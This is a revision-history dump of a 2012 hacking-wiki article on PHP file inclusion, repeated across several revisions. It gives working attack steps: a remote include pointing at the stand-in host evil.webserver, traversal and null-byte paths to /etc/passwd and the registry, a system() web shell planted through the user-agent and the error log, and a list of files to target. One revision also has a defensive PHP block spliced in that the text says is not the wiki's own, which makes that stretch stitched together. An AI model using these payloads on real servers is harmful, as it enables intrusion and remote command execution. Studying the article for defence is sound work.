For example, one can use the telnet command and cause a 404 error with a GET request:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
GET <?php system($_GET['cmd']) ?><br />
</source><br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
Note that the log location may vary.<br />
<br />
=== Useful files for LFI ===<br />
<br />
* /etc/passwd<br />
* /etc/group<br />
* /etc/security/passwd<br />
* /etc/security/group<br />
* apache/logs/access.log<br />
* apache/logs/error.log<br />
* /var/log/access.log<br />
* /var/log/error.log<br />
* /proc/self/cmdline<br />
* /proc/self/fd/<number><br />
* /var/apache/access_log<br />
* /var/apache/error_log<br />
* /var/log/apache/<br />
* /var/log/httpd/<br />
* /usr/local/apache/logs/<br />
* /usr/local/apache/conf/httpd.conf<br />
* /proc/<pid>/fd/<number><br />
* /proc/self/environ<br />
<br><br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7664File Inclusion2012-06-28T21:26:57Z<p>DPYJulietowbaijc: /* Local File Inclusion */</p>
<hr />
<div>File inclusion refers to the process of manipulating unsanitised inputs that make use of PHP's include() function into including files that were not intended to be included. This can be used for the disclosure of privileged information (such as the contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. <b>File inclusion</b> refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
<br />
PHP's include() function does not merely include a library as similar functions do in [[C]] and other programming languages. It also executes any PHP code in the included file on the server side. As a result, if arbitrary code selected by the attacker can be included, it is possible to perform remote command execution.<br />
<br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]]. By providing unexpected inputs that cause sensitive or attacker-controlled files to be included, information can be disclosed and execution can be hijacked.<br />
<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. There are many prepackaged solutions and techniques to stop file inclusion vulnerabilities, although most of them can be bypassed with enough ingenuity. Where possible, it is better to avoid allowing user input to be directly translated into a file inclusion path. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
Remote file inclusion refers to inclusion of a file that is not located on the victim's server. As recent versions of PHP have built-in safeguards that prevent remote inclusion unless it is explicitly enabled by the administrator, this form of vulnerability is now incredibly rare.<br />
<br />
An example URI for a vulnerable site would be '''/include.php?file=howto.php'''<br />
<br />
The [[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
<br><br />
In this example, if include.txt contains [[PHP]] code written by the attacker, that code will be executed on the server side.<br />
<br />
<br><br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous, if not more so. It is far more widespread than RFI but can be more difficult to exploit, subject to whatever limitations and whitelisting are in place to prevent it. Local file inclusion occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, but '''allow_url_fopen''' and '''allow_url_include''' have been disabled in the [[PHP]] configuration. This only allows the attacker to access local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]]; however, reviewing the code it can be seen that [[PHP|PHP]] is reading a file from the local machine and then displaying it on the web page. The problem with this type of code is that, instead of handing execute, write and read permissions to an attacker, the [[programmer]] has still handed over read permissions.<br />
<br />
=== Local File Disclosure ===<br />
<br />
Using this knowledge, the attacker can then specify a file on the remote host that the [[PHP|PHP]] server has permission to read, and that file will be displayed in the web page. For example, the name of the file that contains the registry in Windows is ntusers.dat in the Windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Similarly, on a linux server:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net or the /etc/passwd file in the attacker’s web browser. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to truncate a path that a script builds by concatenation. For example, many scripts append '.php' to a user-supplied string before including it. Appending a null [[byte|Byte]] (%00) will often short-circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is being included, this means that the attacker can see it if it is a text file, or execute any [[PHP|php]] inside of it.<br />
<br />
=== Code Injection ===<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if an attacker uses tamper-data or a similar tool to cause their browser to send a custom user-agent containing the following string:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
/proc/self/environ contains the user-agent of the attacker when included. As a result, when it is included the PHP code contained in the attacker's user-agent is executed, meaning that anything supplied to the page via the 'cmd' GET variable will be executed on the server with PHP's system() function, which executes commands at the OS level.<br />
<br />
The attacker can then retrieve the [[Linux]] or Unix username (the output of the whoami command) from the [[HTML]] returned by the [[PHP|PHP]] file.<br />
<br />
The other method is to use the error log: all requests that are denied or that lead to errors are stored in an error log. This means that if we send an illegal request containing some PHP code, the entire request (including the PHP code) will be written to the error log, which can later be included with LFI to execute our code.<br />
<br />
For example, one can use the telnet command and cause a 404 error with a GET request:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
GET <?php system($_GET['cmd']) ?><br />
</source><br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
Note that the log location may vary.<br />
<br />
=== Useful files for LFI ===<br />
<br />
* /etc/passwd<br />
* /etc/group<br />
* /etc/security/passwd<br />
* /etc/security/group<br />
* apache/logs/access.log<br />
* apache/logs/error.log<br />
* /var/log/access.log<br />
* /var/log/error.log<br />
* /proc/self/cmdline<br />
* /proc/self/fd/<number><br />
* /var/apache/access_log<br />
* /var/apache/error_log<br />
* /var/log/apache/<br />
* /var/log/httpd/<br />
* /usr/local/apache/logs/<br />
* /usr/local/apache/conf/httpd.conf<br />
* /proc/<pid>/fd/<number><br />
* /proc/self/environ<br />
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7663File Inclusion2012-06-28T20:59:41Z<p>DPYJulietowbaijc: G</p>
<hr />
<div>File inclusion refers to the process of manipulating unsanitised inputs that make use of PHP's include() function into including files that were not intended to be included. This can be used for the disclosure of privileged information (such as the contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. <b>File inclusion</b> refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
<br />
PHP's include() function does not merely include a library as similar functions do in [[C]] and other programming languages. It also executes any PHP code in the included file on the server side. As a result, if arbitrary code selected by the attacker can be included, it is possible to perform remote command execution.<br />
<br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]]. By providing unexpected inputs that cause sensitive or attacker-controlled files to be included, information can be disclosed and execution can be hijacked.<br />
<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. There are many prepackaged solutions and techniques to stop file inclusion vulnerabilities, although most of them can be bypassed with enough ingenuity. Where possible, it is better to avoid allowing user input to be directly translated into a file inclusion path. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
Remote file inclusion refers to inclusion of a file that is not located on the victim's server. As recent versions of PHP have built-in safeguards that prevent remote inclusion unless it is explicitly enabled by the administrator, this form of vulnerability is now incredibly rare.<br />
<br />
An example URI for a vulnerable site would be '''/include.php?file=howto.php'''<br />
<br />
The [[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
<br><br />
In this example, if include.txt contains [[PHP]] code written by the attacker, that code will be executed on the server side.<br />
<br />
<br><br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous, if not more so. It is far more widespread than RFI but can be more difficult to exploit, subject to whatever limitations and whitelisting are in place to prevent it. Local file inclusion occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, but '''allow_url_fopen''' and '''allow_url_include''' have been disabled in the [[PHP]] configuration. This only allows the attacker to access local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]]; however, reviewing the code it can be seen that [[PHP|PHP]] is reading a file from the local machine and then displaying it on the web page. The problem with this type of code is that, instead of handing execute, write and read permissions to an attacker, the [[programmer]] has still handed over read permissions. Using this knowledge, the attacker can then specify a file on the remote host that the [[PHP|PHP]] server has permission to read, and that file will be displayed in the web page. For example, the name of the file that contains the registry in Windows is ntusers.dat in the Windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Similarly, on a linux server:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net or the /etc/passwd file in the attacker’s web browser. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to truncate a path that a script builds by concatenation. For example, many scripts append '.php' to a user-supplied string before including it. Appending a null [[byte|Byte]] (%00) will often short-circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is being included, this means that the attacker can see it if it is a text file, or execute any [[PHP|php]] inside of it.<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if an attacker uses tamper-data or a similar tool to cause their browser to send a custom user-agent containing the following string:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
/proc/self/environ contains the attacker's user-agent (as the HTTP_USER_AGENT environment variable), so when it is included the PHP code carried in that user-agent is executed. Anything supplied to the page via the 'cmd' GET variable is then run on the server by PHP's system() function, which executes commands at the OS level.<br />
<br />
They can retrieve the [[Linux]] or Unix username (output of the whoami command) in the return [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the telnet command and cause a 404 error with a GET request:<br />
{{code<br />
|text=<br />
<source lang="php"><br />
GET <?php system($_GET['cmd']) ?><br />
</source><br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
{{notice|Log file location may vary}}<br />
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7662File Inclusion2012-06-28T20:55:25Z<p>DPYJulietowbaijc: /* Local File Inclusion */</p>
<hr />
<div>File inclusion refers to the process of manipulating unsanitised inputs that make use of PHP's include() function into including files that were not intended to be included. This can be used for the disclosure of privileged information (such as the contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. <b>File inclusion</b> refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
<br />
PHP's include() function does not merely include a library as similar functions do in [[C]] and other programming languages. It also executes any PHP code in the included file on the server side. As a result, if arbitrary code selected by the attacker can be included, it is possible to perform remote command execution.<br />
<br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]]. By providing unexpected inputs that cause sensitive or attacker-controlled files to be included, information can be disclosed and execution can be hijacked.<br />
<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. There are many prepackaged solutions and techniques to stop file inclusion vulnerabilities, although most of them can be bypassed with enough ingenuity. Where possible, it is better to avoid allowing user input to be directly translated into a file inclusion path. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
Remote file inclusion refers to inclusion of a file that is not located on the victim's server. As recent versions of PHP have built-in safeguards that prevent remote inclusion unless it is explicitly enabled by the administrator, this form of vulnerability is now incredibly rare.<br />
<br />
The example URI of a vulnerable site will be '''/include.php?file=howto.php''' <br />
<br />
[[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
<br><br />
In this example, if include.txt contains some php code designed by the attacker, this will cause this code to be executed on the server side.<br />
<br />
<br><br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous if not more so. It is far more widespread than RFI but can be more difficult to exploit, subject to whatever limitations and whitelisting are in place to prevent it. Local file inclusion occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, but '''allow_url_fopen''' and '''allow_url_include''' have been disabled in the [[PHP]] configuration. This only allows the attacker to access local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]], but reviewing the code shows that [[PHP|PHP]] is now reading a file from the local machine and displaying it on the web page. The problem with this type of code is that, although the [[programmer]] no longer relinquishes execute and write permissions to an attacker, read permissions have still been relinquished. Knowing this, the attacker can specify any file on the host that the [[PHP|PHP]] server has permission to read, and that file will be displayed in the web page. For example, the file that contains the registry on Windows is ntusers.dat in the Windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Similarly, on a [[Linux]] server:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net or the /etc/passwd file in the attacker’s web browser. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null [[byte|Byte]] (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is included rather than merely read, the attacker can view it if it is a text file, and any [[PHP|php]] inside it is executed.<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if a browser sends a user-agent string containing [[PHP|PHP]] code:<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
They can retrieve the [[Linux]] or Unix username (output of the whoami command) in the return [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the telnet command and cause a 404 error with a GET request:<br />
{{code<br />
|text=<br />
<source lang="php"><br />
GET <?php system($_GET['cmd']) ?><br />
</source><br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
{{notice|Log file location may vary}}<br />
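The whitelisting fix recommended in the introduction, applied to the traversal, null-byte and remote-URL inputs shown in this section, as an added example that is not the wiki's code: a replacement for include($_GET['file']) that uses the parameter only as an allowlist key, a confined-directory resolver for when the page set is dynamic, and a classifier that labels raw ?file= values the way a log review would. The page names and the pages/ directory are assumed.

```php
<?php
// Added example (not the wiki's code). Replaces include($_GET['file']) so the
// inputs shown above (../ traversal, a %00 null byte, an http:// URL) cannot
// select a file. The page names and the pages/ directory are assumed.

// 1. Allowlist: the request value is only ever a lookup key, so it never
//    becomes part of a filesystem path and "../", "%00" or "http://" have
//    nothing to act on.
const PAGES = [
    'welcome' => 'welcome.php',
    'howto'   => 'howto.php',
];

function resolve_allowlisted(string $requested): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    return __DIR__ . '/pages/' . PAGES[$requested];
}

// 2. Dynamic page set: confine the resolved path to one directory. Use this
//    only when an allowlist is genuinely impossible.
function resolve_within(string $baseDir, string $requested): ?string
{
    // A null byte truncates the name in old PHP (the %00 trick) and makes
    // realpath() throw in PHP 8; a scheme prefix turns a local include into RFI.
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $requested)) {
        return null;
    }
    $base = realpath($baseDir);
    // realpath() collapses every "..", follows symlinks and fails on missing files.
    $target = realpath($baseDir . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($base === false || $target === false) {
        return null;
    }
    // The resolved file must lie strictly inside the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// 3. Log review: label a raw ?file= value without touching the filesystem.
//    Returns the reason it is suspicious, or null for a plain page name.
function classify_file_param(string $value): ?string
{
    if (strpos($value, "\0") !== false || stripos($value, '%00') !== false) {
        return 'null byte';
    }
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $value)) {
        return 'URL scheme (remote or wrapper include)';
    }
    if (preg_match('#(^|[/\\\\])\.\.([/\\\\]|$)#', $value)) {
        return 'directory traversal';
    }
    if (preg_match('#^([/\\\\]|[A-Za-z]:)#', $value)) {
        return 'absolute path';
    }
    if (!preg_match('#^[A-Za-z0-9_-]+$#', $value)) {
        return 'unexpected characters';
    }
    return null;
}

// Constructed sample values taken from the URLs discussed above.
$samples = [
    'welcome',
    '../../../../../../../../../../../../../etc/passwd',
    '../../../../../../../../../../../../../etc/passwd%00',
    'http://evil.webserver/include.txt',
    '/proc/self/environ',
    '../../../../../../../../../../../../../usr/local/apache/log/error_log',
];
foreach ($samples as $value) {
    printf("%-70s -> %s\n", $value, classify_file_param($value) ?? 'plain page name');
}

// In the page handler, instead of include($_GET['file']):
//   $path = resolve_allowlisted($_GET['file'] ?? 'welcome');
//   if ($path === null) { http_response_code(404); exit('Unknown page'); }
//   include $path;
```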
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7661File Inclusion2012-06-28T20:51:35Z<p>DPYJulietowbaijc: /* Remote File Inclusion */</p>
DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7660File Inclusion2012-06-28T20:48:12Z<p>DPYJulietowbaijc: /* Remote File Inclusion */</p>
DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7659File Inclusion2012-06-28T20:44:17Z<p>DPYJulietowbaijc: /* Remote File Inclusion */</p>
<hr />
<div>File inclusion refers to the process of manipulating unsanitised inputs that make use of PHP's include() function into including files that were not intended to be included. This can be used for the disclosure of privileged information (such as the contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. <b>File inclusion</b> refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
<br />
PHP's include() function does not merely include a library as similar functions do in [[C]] and other programming languages. It also executes any PHP code in the included file on the server side. As a result, if arbitrary code selected by the attacker can be included, it is possible to perform remote<br />
command execution.<br />
<br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]]. By providing unexpected inputs that cause sensitive or attacker-controlled files to be included, information can be disclosed and execution can be hijacked.<br />
<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. There are many prepackaged solutions and techniques to stop file inclusion vulnerabilities, although most of them can be bypassed with enough ingenuity. Where possible, it is better to avoid allowing user input to be directly translated into a file inclusion path. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
Remote file inclusion refers to inclusion of a file that is not located on the victim's server. As recent versions of PHP have built-in safeguards that prevent remote inclusion unless it is explicitly enabled by the administrator, this form of vulnerability is now incredibly rare.<br />
<br />
The example URI of a vulnerable site will be '''/include.php?file=howto.php''' <br />
<br />
[[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
If include.txt contains some php code designed by the attacker, this will cause this code to be executed on the server side, allowing for abritrary code execution.<br />
<br />
{{notice|This is known as Remote File Inclusion or RFI.}}<br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous if not more so. Local file inclusion occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, however '''allow_url_fopen''' and '''allow_url_includes''' has been disabled in the [[PHP]] configuration. This will only allow the attacker to access local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]], however reviewing the code it can be seen that [[PHP|PHP]] is reading from a file on the local machine and then displaying it on the web page. The problem with this type of code is that now, instead of relinquishing execute, write, and read level permissions to an attacker, the [[programmer]] has still relinquished read level permissions to the attacker. Using this knowledge, the attacker can then specify a file on the remote host that the [[PHP|PHP]] server has permission to read and that file will be displayed in the web page. For example, the name of the file that contains the registry in windows is ntusers.dat in the windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net in the attacker’s web browser. The attacker can then use the information gleaned from the registry to gather username and [[password]] hash combinations and begin cracking them. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null [[byte|Byte]] (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is being included, this means that the attacker can see it if it is a text file, or execute any [[PHP|php]] inside of it.<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if a browser sends a user-agent string containing [[PHP|PHP]] code :<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
They can retrieve the [[Linux]] or Unix username (the output of the whoami command) in the returned [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the telnet command and cause a 404 error with a GET request:<br />
{{code<br />
|text=<br />
<source lang="php"><br />
GET <?php system($_GET['cmd']) ?><br />
</source><br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
{{notice|Log file location may vary}}<br />
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
